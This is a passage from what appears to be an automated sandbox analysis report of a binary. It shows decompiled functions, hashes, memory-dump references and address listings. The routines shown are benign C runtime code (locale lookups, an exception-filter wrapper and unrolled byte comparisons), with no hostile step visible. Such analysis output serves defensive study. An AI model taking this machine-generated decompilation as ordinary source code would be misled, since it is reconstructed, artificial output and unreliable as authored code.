                                                        • Instruction Fuzzy Hash: 2DB09232088208EBCB006FE1FC09B587F38FB14692F018010F60E540618BB26512AEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5EF97, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumSystemLocalesEx.KERNEL32(?,?,?,00000000), ref: 00A5EFA5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: EnumLocalesSystem
                                                        • String ID:
                                                        • API String ID: 2099609381-0
                                                        • Opcode ID: 9ba1b1d8accdfa6e2056aa36950a666fefb7d803e9f244f5bc97d695e110a34d
                                                        • Instruction ID: 5778ee29467634c6becaa3cf84adc9cda74e0ddc4e1953f0083eed45d882edfe
                                                        • Opcode Fuzzy Hash: 9ba1b1d8accdfa6e2056aa36950a666fefb7d803e9f244f5bc97d695e110a34d
                                                        • Instruction Fuzzy Hash: BFC0483208820CBBCF025F81EC05B993F2AFB08664F048020FA1C1806087B2A521AB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5EFCC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoEx.KERNEL32(?,?,00000002,?,?,00A5A92C,?,?,?,00000002), ref: 00A5EFDB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID:
                                                        • API String ID: 2299586839-0
                                                        • Opcode ID: 8ea616e337c3e33c9d36c42f369258d6b7ca8466bebd3f94dc754304a9249aa5
                                                        • Instruction ID: 5316363a1ab79b99d5257620fe90084ea7300af476968a301226c7ff2fe91091
                                                        • Opcode Fuzzy Hash: 8ea616e337c3e33c9d36c42f369258d6b7ca8466bebd3f94dc754304a9249aa5
                                                        • Instruction Fuzzy Hash: 1DC0483200420DFBCF029FD1EC0489A3F3AFB08261B048010FA1814030C773D932AF92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A54BC3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A54BC3(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                                                        0x00a54bd0

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A54BC9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 8afd58f716ac0e4afc999530d74967f11220b4588e720502042109f7f210286d
                                                        • Instruction ID: f01513dabe333f53b75ccb602ff76dd46adb51d861824ea91f550d7f3a6cfe1a
                                                        • Opcode Fuzzy Hash: 8afd58f716ac0e4afc999530d74967f11220b4588e720502042109f7f210286d
                                                        • Instruction Fuzzy Hash: 56A0113008820CAB8B002F82FC088883F2CFB002A0B008020F80E000208BA2AA22AA82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A65810, Relevance: .3, Instructions: 345COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A65810(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                                        0x00a65810
                                                        0x00a65810
                                                        0x00a65816
                                                        0x00a6589d
                                                        0x00a6589f
                                                        0x00a658a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a658a7
                                                        0x00a658ad
                                                        0x00a65934
                                                        0x00a65936
                                                        0x00a65938
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6593e
                                                        0x00a65944
                                                        0x00a659cb
                                                        0x00a659cd
                                                        0x00a659cf
                                                        0x00000000
                                                        0x00000000
                                                        0x00a659d5
                                                        0x00a659db
                                                        0x00a65a62
                                                        0x00a65a64
                                                        0x00a65a66
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65a6c
                                                        0x00a65a72
                                                        0x00a65af9
                                                        0x00a65afb
                                                        0x00a65afd
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65b09
                                                        0x00a65b91
                                                        0x00a65b93
                                                        0x00a65b95
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65b9b
                                                        0x00a65ba1
                                                        0x00a65c28
                                                        0x00a65c2a
                                                        0x00a65c2c
                                                        0x00a65c2c
                                                        0x00000000
                                                        0x00a65c2c
                                                        0x00a65bae
                                                        0x00a65bb0
                                                        0x00a65bc8
                                                        0x00a65bd0
                                                        0x00a65bd2
                                                        0x00a65bea
                                                        0x00a65bf2
                                                        0x00a65bf4
                                                        0x00a65c0c
                                                        0x00a65c14
                                                        0x00a65c16
                                                        0x00a65c1f
                                                        0x00a65c1f
                                                        0x00000000
                                                        0x00a65c16
                                                        0x00a65bfd
                                                        0x00a65c06
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65c06
                                                        0x00a65bdb
                                                        0x00a65be4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65be4
                                                        0x00a65bb9
                                                        0x00a65bc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65bc2
                                                        0x00a65b17
                                                        0x00a65b19
                                                        0x00a65b31
                                                        0x00a65b39
                                                        0x00a65b3b
                                                        0x00a65b53
                                                        0x00a65b5b
                                                        0x00a65b5d
                                                        0x00a65b75
                                                        0x00a65b7d
                                                        0x00a65b7f
                                                        0x00a65b88
                                                        0x00a65b88
                                                        0x00000000
                                                        0x00a65b7f
                                                        0x00a65b66
                                                        0x00a65b6f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65b6f
                                                        0x00a65b44
                                                        0x00a65b4d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65b4d
                                                        0x00a65b22
                                                        0x00a65b2b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65b2b
                                                        0x00a65a7f
                                                        0x00a65a81
                                                        0x00a65a99
                                                        0x00a65aa1
                                                        0x00a65aa3
                                                        0x00a65abb
                                                        0x00a65ac3
                                                        0x00a65ac5
                                                        0x00a65add
                                                        0x00a65ae5
                                                        0x00a65ae7
                                                        0x00a65af0
                                                        0x00a65af0
                                                        0x00000000
                                                        0x00a65ae7
                                                        0x00a65ace
                                                        0x00a65ad7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65ad7
                                                        0x00a65aac
                                                        0x00a65ab5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65ab5
                                                        0x00a65a8a
                                                        0x00a65a93
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65a93
                                                        0x00a659e8
                                                        0x00a659ea
                                                        0x00a65a02
                                                        0x00a65a0a
                                                        0x00a65a0c
                                                        0x00a65a24
                                                        0x00a65a2c
                                                        0x00a65a2e
                                                        0x00a65a46
                                                        0x00a65a4e
                                                        0x00a65a50
                                                        0x00a65a59
                                                        0x00a65a59
                                                        0x00000000
                                                        0x00a65a50
                                                        0x00a65a37
                                                        0x00a65a40
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65a40
                                                        0x00a65a15
                                                        0x00a65a1e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65a1e
                                                        0x00a659f3
                                                        0x00a659fc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a659fc
                                                        0x00a65951
                                                        0x00a65953
                                                        0x00a6596b
                                                        0x00a65973
                                                        0x00a65975
                                                        0x00a6598d
                                                        0x00a65995
                                                        0x00a65997
                                                        0x00a659af
                                                        0x00a659b7
                                                        0x00a659b9
                                                        0x00a659c2
                                                        0x00a659c2
                                                        0x00000000
                                                        0x00a659b9
                                                        0x00a659a0
                                                        0x00a659a9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a659a9
                                                        0x00a6597e
                                                        0x00a65987
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65987
                                                        0x00a6595c
                                                        0x00a65965
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65965
                                                        0x00a658ba
                                                        0x00a658bc
                                                        0x00a658d4
                                                        0x00a658dc
                                                        0x00a658de
                                                        0x00a658f6
                                                        0x00a658fe
                                                        0x00a65900
                                                        0x00a65918
                                                        0x00a65920
                                                        0x00a65922
                                                        0x00a6592b
                                                        0x00a6592b
                                                        0x00000000
                                                        0x00a65922
                                                        0x00a65909
                                                        0x00a65912
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65912
                                                        0x00a658e7
                                                        0x00a658f0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a658f0
                                                        0x00a658c5
                                                        0x00a658ce
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6581c
                                                        0x00a6581c
                                                        0x00a65823
                                                        0x00a65825
                                                        0x00a6583d
                                                        0x00a6583d
                                                        0x00a65845
                                                        0x00a65847
                                                        0x00a6585f
                                                        0x00a6585f
                                                        0x00a65867
                                                        0x00a65869
                                                        0x00a65881
                                                        0x00a65881
                                                        0x00a65889
                                                        0x00a6588b
                                                        0x00a65894
                                                        0x00a65894
                                                        0x00000000
                                                        0x00a6588b
                                                        0x00a6586f
                                                        0x00a65872
                                                        0x00a6587b
                                                        0x00a653d3
                                                        0x00a653d3
                                                        0x00a661c3
                                                        0x00a661c3
                                                        0x00000000
                                                        0x00a6587b
                                                        0x00a6584d
                                                        0x00a65850
                                                        0x00a65859
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65859
                                                        0x00a6582b
                                                        0x00a6582e
                                                        0x00a65837
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65837

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction ID: 9950977492c2454df682191dc873aa767f55eb295ce6127fbe88af79e4622efd
                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction Fuzzy Hash: 15C15232A0959349DB2D473AC47413FBAB15EA2BF171A075DD4F2CF1D4EEA0C964DA20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A65C45, Relevance: .3, Instructions: 341COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A65C45(void* __edx, void* __esi) {
				signed int _t196;
				signed char _t197;
				signed char _t198;
				signed char _t199;
				signed char _t201;
				signed char _t202;
				signed int _t245;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t335;

				_t335 = __esi;
				_t293 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t245 = 0;
					L14:
					if(_t245 != 0) {
						goto L1;
					}
					_t197 =  *(_t335 - 0x1b);
					if(_t197 ==  *(_t293 - 0x1b)) {
						_t245 = 0;
						L25:
						if(_t245 != 0) {
							goto L1;
						}
						_t198 =  *(_t335 - 0x17);
						if(_t198 ==  *(_t293 - 0x17)) {
							_t245 = 0;
							L36:
							if(_t245 != 0) {
								goto L1;
							}
							_t199 =  *(_t335 - 0x13);
							if(_t199 ==  *(_t293 - 0x13)) {
								_t245 = 0;
								L47:
								if(_t245 != 0) {
									goto L1;
								}
								if( *(_t335 - 0xf) ==  *(_t293 - 0xf)) {
									_t245 = 0;
									L58:
									if(_t245 != 0) {
										goto L1;
									}
									_t201 =  *(_t335 - 0xb);
									if(_t201 ==  *(_t293 - 0xb)) {
										_t245 = 0;
										L69:
										if(_t245 != 0) {
											goto L1;
										}
										_t202 =  *(_t335 - 7);
										if(_t202 ==  *(_t293 - 7)) {
											_t245 = 0;
											L80:
											if(_t245 != 0) {
												goto L1;
											}
											_t296 = ( *(_t335 - 3) & 0x000000ff) - ( *(_t293 - 3) & 0x000000ff);
											if(_t296 == 0) {
												L83:
												_t298 = ( *(_t335 - 2) & 0x000000ff) - ( *(_t293 - 2) & 0x000000ff);
												if(_t298 == 0) {
													L3:
													_t245 = ( *(_t335 - 1) & 0x000000ff) - ( *(_t293 - 1) & 0x000000ff);
													if(_t245 != 0) {
														_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t245 = (0 | _t298 > 0x00000000) * 2 - 1;
												if(_t245 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t245 = (0 | _t296 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t300 = (_t202 & 0x000000ff) - ( *(_t293 - 7) & 0x000000ff);
										if(_t300 == 0) {
											L73:
											_t302 = ( *(_t335 - 6) & 0x000000ff) - ( *(_t293 - 6) & 0x000000ff);
											if(_t302 == 0) {
												L75:
												_t304 = ( *(_t335 - 5) & 0x000000ff) - ( *(_t293 - 5) & 0x000000ff);
												if(_t304 == 0) {
													L77:
													_t245 = ( *(_t335 - 4) & 0x000000ff) - ( *(_t293 - 4) & 0x000000ff);
													if(_t245 != 0) {
														_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t245 = (0 | _t304 > 0x00000000) * 2 - 1;
												if(_t245 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t245 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t245 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t306 = (_t201 & 0x000000ff) - ( *(_t293 - 0xb) & 0x000000ff);
									if(_t306 == 0) {
										L62:
										_t308 = ( *(_t335 - 0xa) & 0x000000ff) - ( *(_t293 - 0xa) & 0x000000ff);
										if(_t308 == 0) {
											L64:
											_t310 = ( *(_t335 - 9) & 0x000000ff) - ( *(_t293 - 9) & 0x000000ff);
											if(_t310 == 0) {
												L66:
												_t245 = ( *(_t335 - 8) & 0x000000ff) - ( *(_t293 - 8) & 0x000000ff);
												if(_t245 != 0) {
													_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t245 = (0 | _t310 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t245 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t245 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t312 = ( *(_t335 - 0xf) & 0x000000ff) - ( *(_t293 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L51:
									_t314 = ( *(_t335 - 0xe) & 0x000000ff) - ( *(_t293 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L53:
										_t316 = ( *(_t335 - 0xd) & 0x000000ff) - ( *(_t293 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L55:
											_t245 = ( *(_t335 - 0xc) & 0x000000ff) - ( *(_t293 - 0xc) & 0x000000ff);
											if(_t245 != 0) {
												_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t245 = (0 | _t316 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t245 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t245 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t318 = (_t199 & 0x000000ff) - ( *(_t293 - 0x13) & 0x000000ff);
							if(_t318 == 0) {
								L40:
								_t320 = ( *(_t335 - 0x12) & 0x000000ff) - ( *(_t293 - 0x12) & 0x000000ff);
								if(_t320 == 0) {
									L42:
									_t322 = ( *(_t335 - 0x11) & 0x000000ff) - ( *(_t293 - 0x11) & 0x000000ff);
									if(_t322 == 0) {
										L44:
										_t245 = ( *(_t335 - 0x10) & 0x000000ff) - ( *(_t293 - 0x10) & 0x000000ff);
										if(_t245 != 0) {
											_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t245 = (0 | _t322 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t245 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t245 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t324 = (_t198 & 0x000000ff) - ( *(_t293 - 0x17) & 0x000000ff);
						if(_t324 == 0) {
							L29:
							_t326 = ( *(_t335 - 0x16) & 0x000000ff) - ( *(_t293 - 0x16) & 0x000000ff);
							if(_t326 == 0) {
								L31:
								_t328 = ( *(_t335 - 0x15) & 0x000000ff) - ( *(_t293 - 0x15) & 0x000000ff);
								if(_t328 == 0) {
									L33:
									_t245 = ( *(_t335 - 0x14) & 0x000000ff) - ( *(_t293 - 0x14) & 0x000000ff);
									if(_t245 != 0) {
										_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t245 = (0 | _t328 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t245 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t245 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t245 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t330 = (_t197 & 0x000000ff) - ( *(_t293 - 0x1b) & 0x000000ff);
					if(_t330 == 0) {
						L18:
						_t332 = ( *(_t335 - 0x1a) & 0x000000ff) - ( *(_t293 - 0x1a) & 0x000000ff);
						if(_t332 == 0) {
							L20:
							_t334 = ( *(_t335 - 0x19) & 0x000000ff) - ( *(_t293 - 0x19) & 0x000000ff);
							if(_t334 == 0) {
								L22:
								_t245 = ( *(_t335 - 0x18) & 0x000000ff) - ( *(_t293 - 0x18) & 0x000000ff);
								if(_t245 != 0) {
									_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
								}
